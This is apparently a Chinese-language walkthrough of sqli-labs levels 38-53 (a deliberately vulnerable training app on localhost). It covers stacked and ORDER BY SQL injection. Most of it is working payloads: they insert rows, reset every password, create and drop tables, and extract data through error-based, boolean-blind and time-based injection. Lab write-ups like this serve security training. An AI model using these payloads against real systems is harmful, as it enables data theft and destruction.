sqli-labs通关攻略38-53[Stacked Injections]
Stacked Injections
文章目录
- Stacked Injections
- less-38
- less-39
- less-40
- less-41
- less-42
- less-43
- less-44
- less-45
- less-46
- less-47
- less-48
- less-49
- less-50
- less-51
- less-52
- less-53
less-38
![sqli-labs通关攻略38-53[Stacked Injections]_第1张图片](http://img.e-com-net.com/image/info8/59d74a162ead45659476c0d0dedcb1f9.jpg)
由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。
所以可以尝试堆叠注入,堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出我们想要的结果,所以,堆叠注入在黑盒测试下只能通过模糊测试来进行测试。由于是直接执行多条SQL语句,所以对SQL语句就并无限制,可以通过堆叠注入增删改查等数据库操作。
我们在知道数据库结构后尝试进行插入数据操作
http://127.0.0.1/sql-labs/Less-38/?id=1';insert into users(id,username,password)values(20,'keepb1ue','2020')--+
插入后,我们直接切换到id 20,看看是否插入成功
![sqli-labs通关攻略38-53[Stacked Injections]_第2张图片](http://img.e-com-net.com/image/info8/c6f3e0f161f54b7fb2095d6e75561ca7.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第3张图片](http://img.e-com-net.com/image/info8/7a01577aa2b842cd9a727ed3adc30506.jpg)
当然我们还可以执行任何SQL语句,这也说明了堆叠注入危害极大。
less-39
![sqli-labs通关攻略38-53[Stacked Injections]_第4张图片](http://img.e-com-net.com/image/info8/f1a344f43538476594fb7e050230c799.jpg)
和38一样,堆叠注入,只不过将id参数包裹引号去掉罢了。
http://127.0.0.1/sql-labs/Less-39/?id=1;insert into users(id,username,password)values(19,'allblue','2019')--+
![sqli-labs通关攻略38-53[Stacked Injections]_第5张图片](http://img.e-com-net.com/image/info8/cb4bc1936012490db3afb2292baabd64.jpg)
less-40
![sqli-labs通关攻略38-53[Stacked Injections]_第6张图片](http://img.e-com-net.com/image/info8/76ea071cb3a44cac90b6285acd26e907.jpg)
不多说
http://127.0.0.1/sql-labs/Less-40/?id=1');insert into users(id,username,password)values(18,'hacker','2018')--+
![sqli-labs通关攻略38-53[Stacked Injections]_第7张图片](http://img.e-com-net.com/image/info8/556b11490454424e9bff6d413b843fd3.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第8张图片](http://img.e-com-net.com/image/info8/605eb3006a1640e1acf6ab1713c48893.jpg)
less-41
![sqli-labs通关攻略38-53[Stacked Injections]_第9张图片](http://img.e-com-net.com/image/info8/cb5230cc78e64ca58cc0346cfddefd37.jpg)
还是整数型堆叠注入
![sqli-labs通关攻略38-53[Stacked Injections]_第10张图片](http://img.e-com-net.com/image/info8/bd08f8b87d03462ebe81e1a150699c34.jpg)
http://127.0.0.1/sql-labs/Less-41/?id=1;update users set password='hacker'
where id>0--+
将所有密码都改成了hacker![sqli-labs通关攻略38-53[Stacked Injections]_第11张图片](http://img.e-com-net.com/image/info8/3739fc6bad0442a09bf453f2de2d36d3.jpg)
less-42
![sqli-labs通关攻略38-53[Stacked Injections]_第12张图片](http://img.e-com-net.com/image/info8/c192d22b3930438386a40ac0f4898134.jpg)
基于24关卡新增post的堆叠:
login_user=admin&login_password=1';create table keepb1ue like users#
创建一个和users同样结构的数据库![sqli-labs通关攻略38-53[Stacked Injections]_第13张图片](http://img.e-com-net.com/image/info8/e9e0992a78624ace9cdb42200669ecc5.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第14张图片](http://img.e-com-net.com/image/info8/0c3b6cd2f853417fb33bbecf3465aceb.jpg)
less-43
![sqli-labs通关攻略38-53[Stacked Injections]_第15张图片](http://img.e-com-net.com/image/info8/edeec81c0d95455dbbc7efa7aa8d5e34.jpg)
post 闭合’)
login_user=King&login_password=123');insert into users(id,username,password)values(22,'test22','test22')#
![sqli-labs通关攻略38-53[Stacked Injections]_第16张图片](http://img.e-com-net.com/image/info8/c1048e86d3f94195bdec3daed1e4ce3f.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第17张图片](http://img.e-com-net.com/image/info8/d58c92f647a6454daf0f7204afae336d.jpg)
less-44
![sqli-labs通关攻略38-53[Stacked Injections]_第18张图片](http://img.e-com-net.com/image/info8/d357224e7ca94d409ce7fe025bbf2245.jpg)
与43比较,只是闭合方式改了和去掉了一个打印报错信息的语句。
那如果在实战中没有报错信息那就只能去fuzz了
login_user=King&login_password=123';drop table keepb1ue#
![sqli-labs通关攻略38-53[Stacked Injections]_第19张图片](http://img.e-com-net.com/image/info8/ff59f900ef5e4659b94dc3186d51bbb4.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第20张图片](http://img.e-com-net.com/image/info8/620a5d9a432c4fe8935925046bd9d988.jpg)
less-45
![sqli-labs通关攻略38-53[Stacked Injections]_第21张图片](http://img.e-com-net.com/image/info8/573ca5dc58394f898963482aab72f880.jpg)
mysqli_muti_query,还是闭合 ')堆叠
login_user=King&login_password=123');insert into
users(id,username,password)values(23,'KB','KB')#
less-46
order by注入
![sqli-labs通关攻略38-53[Stacked Injections]_第22张图片](http://img.e-com-net.com/image/info8/fb9495f2a544428b8852dcb170fbc12b.jpg)
我们可以通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
![sqli-labs通关攻略38-53[Stacked Injections]_第23张图片](http://img.e-com-net.com/image/info8/7ca169ca3fbf4080a4f66a5e2b6a443c.jpg)
![sqli-labs通关攻略38-53[Stacked Injections]_第24张图片](http://img.e-com-net.com/image/info8/9852a07c93384751981093b551c7d5b4.jpg)
证明的确有order by 注入
order by注入有很多种方式进行注入
比如:报错注入、盲注、异或注入。如果达到一定条件还可以联合注入
报错注入很简单:
http://127.0.0.1/sql-labs/Less-46/?sort=1 and
updatexml(1,concat(0x7e,(select database())),1)
![sqli-labs通关攻略38-53[Stacked Injections]_第25张图片](http://img.e-com-net.com/image/info8/8cef4471c14f47f8af23dba72d2508b8.jpg)
盲注:
http://127.0.0.1/sql-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)
根据rand来对SQL语句对错做判断,因为rand(True)和rand(False)的回显结果是不一样的。
less-47
![sqli-labs通关攻略38-53[Stacked Injections]_第26张图片](http://img.e-com-net.com/image/info8/11a3bd9f42534bf0a962f3d8d1a8e397.jpg)
还是闭合不同
http://127.0.0.1/sql-labs/Less-47/?sort=1' and
updatexml(1,concat(0x7e,(select database())),1) --+
http://127.0.0.1/sql-labs/Less-47/?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
![sqli-labs通关攻略38-53[Stacked Injections]_第27张图片](http://img.e-com-net.com/image/info8/a578ff0636e641228084dfd8dc6d4a2c.jpg)
less-48
![sqli-labs通关攻略38-53[Stacked Injections]_第28张图片](http://img.e-com-net.com/image/info8/7b1f7b6ba7a34e959c0be70efdc315ef.jpg)
本关与less-46的区别在于报错注入不能使用,不进行错误回显,因此其他的方法我们依旧是可以使用的。
可以利用sort=rand(true/false)进行判断。
http://127.0.0.1/sql-labs/Less-48/?sort=rand(ascii(left(database(),1))=150)
![sqli-labs通关攻略38-53[Stacked Injections]_第29张图片](http://img.e-com-net.com/image/info8/27421038e73949acbd7b4fd8c3de6f8b.jpg)
http://127.0.0.1/sql-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)
![sqli-labs通关攻略38-53[Stacked Injections]_第30张图片](http://img.e-com-net.com/image/info8/6387d1cd1a804016955570799dd647b8.jpg)
根据rand(true)和rand(fales)的回显不一样做判断,进行布尔盲注
延时:
http://127.0.0.1/sql-labs/Less-48/?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))
less-49
![sqli-labs通关攻略38-53[Stacked Injections]_第31张图片](http://img.e-com-net.com/image/info8/5cc3200872434594b4ea7fb4a95fd0ab.jpg)
与less47很类似,只是没有错误回显
利用延时注入
http://127.0.0.1/sql-labs/Less-49/?sort=1' and (if(ascii(substr((select username from users where id=1),1,1))=115,0,sleep(5)))--+
less-50
![sqli-labs通关攻略38-53[Stacked Injections]_第32张图片](http://img.e-com-net.com/image/info8/55ac1608fdca4fc582a2563bacb5e5d9.jpg)
order by+堆叠注入
http://127.0.0.1/sql/Less-50/?sort=1;create table keepblue like users--+
less-51
![sqli-labs通关攻略38-53[Stacked Injections]_第33张图片](http://img.e-com-net.com/image/info8/d1534b6f9fef46cd84e803c0204d6c3e.jpg)
和上一关一样,闭合变成’:
http://127.0.0.1/sql/Less-51/?sort=1';drop table keepb1ue--+
less-52
![sqli-labs通关攻略38-53[Stacked Injections]_第34张图片](http://img.e-com-net.com/image/info8/84ad90e91b6d409eb685198c02c1a81b.jpg)
去掉了闭合,去掉了错误提示
http://127.0.0.1/sql/Less-52/?sort=1;create table keepb1ue like users--+
less-53
![sqli-labs通关攻略38-53[Stacked Injections]_第35张图片](http://img.e-com-net.com/image/info8/ca05f726be674e879163233916df1b56.jpg)
和51一样的做法,不多做讲解
http://127.0.0.1/sql/Less-53/?sort=1';drop table keepb1ue--+